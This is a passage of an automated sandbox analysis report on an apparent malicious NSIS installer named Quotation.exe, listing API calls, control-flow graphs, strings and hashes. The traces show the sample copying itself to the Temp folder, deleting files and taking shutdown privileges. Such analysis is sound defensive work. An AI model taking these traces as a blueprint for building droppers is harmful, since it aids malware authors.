                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004036F6
                                                                                            • GetVersionExW.KERNEL32(?), ref: 0040371F
                                                                                            • GetVersionExW.KERNEL32(?), ref: 00403732
                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037DA
                                                                                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403814
                                                                                            • OleInitialize.OLE32(00000000), ref: 0040381B
                                                                                            • SHGetFileInfoW.SHELL32(004085B0,00000000,?,000002B4,00000000), ref: 0040383A
                                                                                            • GetCommandLineW.KERNEL32(007A7540,NSIS Error), ref: 0040384F
                                                                                            • CharNextW.USER32(00000000,007B3000,?,007B3000,00000000), ref: 0040389B
                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403999
                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039AA
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039B6
                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039CA
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039D2
                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004039E3
                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004039EB
                                                                                            • DeleteFileW.KERNELBASE(1033), ref: 00403A05
                                                                                              • Part of subcall function 004033CB: GetTickCount.KERNEL32 ref: 004033DE
                                                                                              • Part of subcall function 004033CB: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation.exe,00000400), ref: 004033FA
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,00000000), ref: 00403AA8
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00408600,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,00000000), ref: 00403ABB
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,00000000), ref: 00403ACA
                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,00000000), ref: 00403AD9
                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B01
                                                                                            • DeleteFileW.KERNEL32(0079F200,0079F200,?,007A9000,?), ref: 00403B54
                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\Quotation.exe,0079F200,00000001), ref: 00403B66
                                                                                            • CloseHandle.KERNEL32(00000000,0079F200,0079F200,?,0079F200,00000000), ref: 00403B9F
                                                                                              • Part of subcall function 00405DFC: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00405E04
                                                                                              • Part of subcall function 00405DFC: GetLastError.KERNEL32 ref: 00405E0E
                                                                                            • OleUninitialize.OLE32(00000000), ref: 00403BCD
                                                                                            • ExitProcess.KERNEL32 ref: 00403BE4
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BFA
                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403C01
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C16
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403C39
                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5E
                                                                                              • Part of subcall function 004065D4: CharNextW.USER32(?,0040389A,007B3000,?,007B3000,00000000), ref: 004065EA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
                                                                                            • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Quotation.exe$C:\Users\user\overlays\besvangredes\Konditorierne$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                            • API String ID: 1152188737-1818686645
                                                                                            • Opcode ID: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
                                                                                            • Instruction ID: ef6c2823884109cd5a884fcd16d1840cc0f2fcd0ed87f9f7bcd5e2f232321f3d
                                                                                            • Opcode Fuzzy Hash: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
                                                                                            • Instruction Fuzzy Hash: B8D14DB16043106AD7207FB19D45B6B3EECAB4574AF05443FF585B62D2DBBC8A40872E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 640 4066f7-406720 call 406616 643 406722-406734 DeleteFileW 640->643 644 406739-406743 640->644 645 4068b8-4068c1 643->645 646 406745-406747 644->646 647 406756-406769 call 406af8 644->647 648 4068a7-4068ad 646->648 649 40674d-406750 646->649 655 406779-40677a call 406cee 647->655 656 40676b-406777 lstrcatW 647->656 653 4068b7 648->653 649->647 651 406870-406878 call 4065ad 649->651 651->653 662 40687a-40688e call 406534 call 406563 651->662 653->645 658 40677f-406784 655->658 656->658 660 406790-406796 lstrcatW 658->660 661 406786-40678e 658->661 663 406798-4067bb lstrlenW FindFirstFileW 660->663 661->660 661->663 676 406890-406892 662->676 677 4068af-4068b2 call 405d18 662->677 665 4067c1-4067c3 663->665 666 406859-40685e 663->666 668 4067c4-4067c9 665->668 666->653 670 406860-40686e 666->670 671 4067e2-4067f5 call 406af8 668->671 672 4067cb-4067d1 668->672 670->648 670->651 685 4067f7-4067fe 671->685 686 406809-406812 call 406563 671->686 674 4067d3-4067d8 672->674 675 40683b-40684c FindNextFileW 672->675 674->671 680 4067da-4067e0 674->680 675->668 683 406852-406853 FindClose 675->683 676->648 681 406894-4068a5 call 405d18 call 40621b 676->681 677->653 680->671 680->675 681->653 683->666 685->675 689 406800-406802 call 4066f7 685->689 693 406833-406836 call 405d18 686->693 694 406814-406816 686->694 696 406807 689->696 693->675 697 406818-406829 call 405d18 call 40621b 694->697 698 40682b-406831 694->698 696->675 697->675 698->675
                                                                                            APIs
                                                                                              • Part of subcall function 00406616: lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 0040666A
                                                                                              • Part of subcall function 00406616: GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B
                                                                                            • DeleteFileW.KERNELBASE(?,?,00000000,76F93420,?), ref: 00406723
                                                                                            • lstrcatW.KERNEL32(007A3A88,\*.*,007A3A88,?,00000000,?,00000000,76F93420,?), ref: 00406775
                                                                                            • lstrcatW.KERNEL32(?,004082B0,?,007A3A88,?,00000000,?,00000000,76F93420,?), ref: 00406796
                                                                                            • lstrlenW.KERNEL32(?), ref: 00406799
                                                                                            • FindFirstFileW.KERNEL32(007A3A88,?), ref: 004067B0
                                                                                            • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00406841
                                                                                            • FindClose.KERNEL32(00000000), ref: 00406853
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                                                                            • String ID: \*.*
                                                                                            • API String ID: 2636146433-1173974218
                                                                                            • Opcode ID: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
                                                                                            • Instruction ID: 325cce783f2df783a7673d4e22b29853c472d97363b16a381ac5d63d2c539c61
                                                                                            • Opcode Fuzzy Hash: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
                                                                                            • Instruction Fuzzy Hash: 2741373210631069D720BB658D05A6B72ACDF92318F16853FF893B21D1EB3C8965C6AF
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
                                                                                            • FindClose.KERNEL32(00000000), ref: 004065C4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileFirst
                                                                                            • String ID:
                                                                                            • API String ID: 2295610775-0
                                                                                            • Opcode ID: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
                                                                                            • Instruction ID: 54e165a9d952ab4a9c526d77f24574b80d9b4166436818e4e9d84c3548612847
                                                                                            • Opcode Fuzzy Hash: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
                                                                                            • Instruction Fuzzy Hash: A5D012315191607FC2501B387F0C84B7A599F65372B114B36B4A6F51E4DA348C628698

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 146 404f70-404f89 147 405111-405123 146->147 148 404f8f-404f95 146->148 149 405125-405165 GetDlgItem * 2 call 4054f8 SetClassLongW call 401533 147->149 150 40516b-40517f 147->150 148->147 151 404f9b-404f9e 148->151 149->150 153 405181-405183 150->153 154 4051bd-4051c2 call 4054c6 150->154 155 404fa0-404fb5 SetWindowPos 151->155 156 404fba-404fbd 151->156 158 4051b5-4051b7 153->158 159 405185-405190 call 401399 153->159 164 4051c7-4051e6 154->164 160 4050fd 155->160 162 40500d-405013 156->162 163 404fbf-404fde ShowWindow 156->163 158->154 171 405488 158->171 159->158 188 405192-4051b0 SendMessageW 159->188 165 405101-40510c call 405739 160->165 167 405015-40502a DestroyWindow 162->167 168 40502f-405032 162->168 163->165 166 404fe4-404ffa GetWindowLongW 163->166 172 4051e8-4051f3 call 401533 164->172 173 4051f9-4051ff 164->173 179 40548a-405491 165->179 166->165 174 405000-405008 ShowWindow 166->174 175 40546c-405473 167->175 176 405034-405042 SetWindowLongW 168->176 177 405047-40504d 168->177 171->179 172->173 185 405205-405207 173->185 186 405448-405461 DestroyWindow EndDialog 173->186 174->165 175->171 184 405475-405477 175->184 176->179 177->160 187 405053-40506d GetDlgItem 177->187 184->171 191 405479-405482 ShowWindow 184->191 185->186 192 40520d-405264 call 405e98 call 4054f8 * 3 GetDlgItem 185->192 189 405467 186->189 193 405092-405097 187->193 194 40506f-405088 SendMessageW IsWindowEnabled 187->194 188->179 189->175 191->171 222 405272-4052c1 ShowWindow KiUserCallbackDispatcher * 2 EnableWindow 192->222 223 405266-40526e 192->223 197 405099-40509a 193->197 198 40509c-40509f 193->198 194->171 196 40508e 194->196 196->193 200 4050dd-4050e2 call 405936 197->200 201 4050a1-4050a8 198->201 202 4050ae-4050b1 198->202 200->165 204 4050e4-4050f7 SendMessageW 201->204 207 4050aa-4050ac 201->207 203 4050b3-4050ba 202->203 202->204 208 4050ca-4050d3 call 401533 203->208 209 4050bc-4050c8 call 401533 203->209 204->160 207->200 208->165 219 4050d5 208->219 218 4050db 209->218 218->200 219->218 224 4052c3-4052c4 222->224 225 4052c6 222->225 223->222 226 4052c7-4052f2 GetSystemMenu EnableMenuItem SendMessageW 224->226 225->226 227 4052f4-405309 SendMessageW 226->227 228 40530b 226->228 229 405311-405357 call 4054e1 call 405cf9 call 406af8 lstrlenW call 405e98 SetWindowTextW call 401399 227->229 228->229 229->164 240 40535d-40535f 229->240 240->164 241 405365-405369 240->241 242 405388-40539c DestroyWindow 241->242 243 40536b-405371 241->243 242->189 245 4053a2-4053cf CreateDialogParamW 242->245 243->171 244 405377-40537d 243->244 244->164 246 405383 244->246 245->175 247 4053d5-40542c call 4054f8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401399 245->247 246->171 247->171 252 40542e-405441 ShowWindow call 4054c6 247->252 254 405446 252->254 254->189
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAF
                                                                                            • ShowWindow.USER32(?), ref: 00404FD9
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404FEA
                                                                                            • ShowWindow.USER32(?,00000004), ref: 00405006
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 0040512D
                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00405137
                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00405151
                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519F
                                                                                            • GetDlgItem.USER32(?,00000003), ref: 0040524E
                                                                                            • ShowWindow.USER32(00000000,?), ref: 00405277
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040528B
                                                                                            • KiUserCallbackDispatcher.NTDLL(?), ref: 0040529F
                                                                                            • EnableWindow.USER32(?), ref: 004052B7
                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CE
                                                                                            • EnableMenuItem.USER32(00000000), ref: 004052D5
                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004052E6
                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FD
                                                                                            • lstrlenW.KERNEL32(Inklinerede Setup: Installing,?,Inklinerede Setup: Installing,00000000), ref: 0040532E
                                                                                              • Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,?,?), ref: 0040604E
                                                                                            • SetWindowTextW.USER32(?,Inklinerede Setup: Installing), ref: 00405346
                                                                                              • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                                              • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                                            • DestroyWindow.USER32(?,00000000), ref: 0040538E
                                                                                            • CreateDialogParamW.USER32(?,?,-007A8560), ref: 004053C2
                                                                                              • Part of subcall function 004054F8: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405512
                                                                                            • GetDlgItem.USER32(?,000003FA), ref: 004053EB
                                                                                            • GetWindowRect.USER32(00000000), ref: 004053F2
                                                                                            • ScreenToClient.USER32(?,?), ref: 004053FE
                                                                                            • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405417
                                                                                            • ShowWindow.USER32(00000008,?,00000000), ref: 00405436
                                                                                              • Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8
                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040547C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                                                                            • String ID: Inklinerede Setup: Installing
                                                                                            • API String ID: 162979904-1772282993
                                                                                            • Opcode ID: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
                                                                                            • Instruction ID: 456415ec42eff5e8f6a9a9f0208e2dc106d0a6226250255d67da48920511729f
                                                                                            • Opcode Fuzzy Hash: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
                                                                                            • Instruction Fuzzy Hash: 38D1C071904B10ABDB20AF21EE44A6B7B68FB89355F00853EF545B21E1CA3D8851CFAD

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 255 405a1c-405a37 call 4068c4 258 405a39-405a49 call 4065fd 255->258 259 405a4b-405a81 call 406955 255->259 267 405aa4-405acd call 40595d call 406616 258->267 263 405a83-405a94 call 406955 259->263 264 405a99-405a9f lstrcatW 259->264 263->264 264->267 273 405ad3-405ad8 267->273 274 405b65-405b6d call 406616 267->274 273->274 275 405ade-405af9 call 406955 273->275 280 405b7b-405ba9 LoadImageW 274->280 281 405b6f-405b76 call 405e98 274->281 279 405afe-405b07 275->279 279->274 284 405b09-405b0f 279->284 282 405c28-405c30 call 401533 280->282 283 405bab-405bd6 RegisterClassW 280->283 281->280 298 405ce2-405ce4 282->298 299 405c36-405c41 call 40595d 282->299 286 405bd8-405bda 283->286 287 405bdf-405c23 SystemParametersInfoW CreateWindowExW 283->287 289 405b11-405b1f call 4065d4 284->289 290 405b22-405b30 lstrlenW 284->290 293 405ce5-405cec 286->293 287->282 289->290 291 405b32-405b40 lstrcmpiW 290->291 292 405b58-405b60 call 406534 call 406af8 290->292 291->292 297 405b42-405b4c GetFileAttributesW 291->297 292->274 301 405b52-405b53 call 406cee 297->301 302 405b4e-405b50 297->302 298->293 308 405c47-405c61 ShowWindow call 40617c 299->308 309 405cc9-405cca call 405842 299->309 301->292 302->292 302->301 316 405c63-405c68 call 40617c 308->316 317 405c6d-405c7e GetClassInfoW 308->317 312 405ccf-405cd1 309->312 314 405cd3-405cd9 312->314 315 405ced-405cef call 401533 312->315 314->298 320 405cdb-405cdd call 401533 314->320 323 405cf4 315->323 316->317 318 405c80-405c94 GetClassInfoW RegisterClassW 317->318 319 405c96-405cb9 DialogBoxParamW call 401533 317->319 318->319 326 405cbe-405cc7 call 403cd6 319->326 320->298 323->323 326->293
                                                                                            APIs
                                                                                              • Part of subcall function 004068C4: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
                                                                                              • Part of subcall function 004068C4: GetProcAddress.KERNEL32(00000000), ref: 004068EE
                                                                                            • lstrcatW.KERNEL32(1033,Inklinerede Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Inklinerede Setup: Installing,00000000,00000002,00000000,76F93420,00000000,76F93170), ref: 00405A9F
                                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,007B3800,1033,Inklinerede Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Inklinerede Setup: Installing,00000000,00000002,00000000), ref: 00405B23
                                                                                            • lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,007B3800,1033,Inklinerede Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Inklinerede Setup: Installing,00000000), ref: 00405B38
                                                                                            • GetFileAttributesW.KERNEL32(Call), ref: 00405B43
                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,007B3800), ref: 00405B8C
                                                                                              • Part of subcall function 004065FD: wsprintfW.USER32 ref: 0040660A
                                                                                            • RegisterClassW.USER32(007A74E0), ref: 00405BD1
                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405BE8
                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1D
                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00405C4F
                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,007A74E0), ref: 00405C7A
                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,007A74E0), ref: 00405C87
                                                                                            • RegisterClassW.USER32(007A74E0), ref: 00405C94
                                                                                            • DialogBoxParamW.USER32(?,00000000,00404F70,00000000), ref: 00405CAF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$Call$Control Panel\Desktop\ResourceLocale$Inklinerede Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$tz
                                                                                            • API String ID: 1975747703-3108346752
                                                                                            • Opcode ID: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
                                                                                            • Instruction ID: 09b92c81f8f4ef2e2e9fd8d830fcc712f1cdd6db1c368b512ccdb95b409c048d
                                                                                            • Opcode Fuzzy Hash: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
                                                                                            • Instruction Fuzzy Hash: 31611370604604BEE7107B65AD42F2B366CEB46748F11813EF941B61E2EB3CA9108FAD

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
